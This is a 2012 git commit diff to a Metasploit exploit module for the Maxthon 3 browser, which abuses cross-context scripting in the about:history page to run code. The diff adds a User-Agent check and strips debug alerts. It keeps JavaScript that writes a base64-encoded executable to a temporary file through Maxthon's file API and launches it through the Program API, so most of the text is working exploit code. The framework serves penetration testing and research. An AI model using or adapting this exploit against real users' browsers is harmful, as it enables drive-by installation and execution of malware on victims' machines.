Some more changes

sinn3r · sinn3r · commit a1336c7b5a28 · 2012-12-07T13:32:44.000-06:00
diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb
@@ -22,14 +22,14 @@ def initialize(info = {})
 				Injection in such privileged/trusted browser zone can be used to modify
 				configuration settings and execute arbitrary commands.
 			},
-			'License' => BSD_LICENSE,
+			'License' => MSF_LICENSE,
 			'Author' =>
 				[ 
 					'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
 				],
 			'References' =>
 				[
-						['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html'],
+					['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html']
 				],
 			'Payload' =>
 				{
@@ -45,19 +45,28 @@ def initialize(info = {})
 		))
 	end
 
+	def is_maxthon3?(request)
+		request.headers['User-Agent'] =~ /Maxthon\/3\.0/ ? true : false
+	end
+
 	def on_request_uri(cli, request)
+		if not is_maxthon3?(request)
+			print_error("Client isn't a Maxthon3 browser. Sending 404")
+			send_not_found(cli)
+		end
 
-		html_hdr = %Q^
+		html_hdr = %Q|
 			<html>
 			<head>
 			<title>Loading</title>
-			^
-		html_ftr = %Q^
+			|
+
+		html_ftr = %Q|
 			</head>
 			<body >
 			<h1>Loading</h1>
 			</body></html>
-			^
+		|
 
 		case request.uri
 			when /\?jspayload/
@@ -74,21 +83,15 @@ def on_request_uri(cli, request)
 				# now this is base64 encoded payload which needs to be passed to the file write api in maxthon.
 				# Then file can be launched via Program DOM API, because of this only Maxthon 3.1 versions are targeted.
 				# The Program DOM API isn't available on Maxthon 3.2 and upper versions.
-				content =
-						%Q{
+				content = %Q{
 					if(maxthon.program)
 					{
-					alert(1);
 					var fileTemp = new maxthon.io.File.createTempFile("test","exe");
 					var fileObj = maxthon.io.File(fileTemp);
 					maxthon.io.FileWriter(fileTemp);
 					maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
 					maxthon.program.Program.launch(fileTemp.name_,"C:");
 					}
-					else
-					{
-					alert(2);
-					}
 				}
 
 			when /\?history/
@@ -97,13 +100,15 @@ def on_request_uri(cli, request)
 					location.href = "about:history";
 				}
 				|
+
 				content = %Q|
 				#{html_hdr}
 				<script>
 				#{js}
 				</script>
 				#{html_ftr}
 				|
+
 			when get_resource()
 				print_status("Sending #{self.name} payload for request #{request.uri}")
 
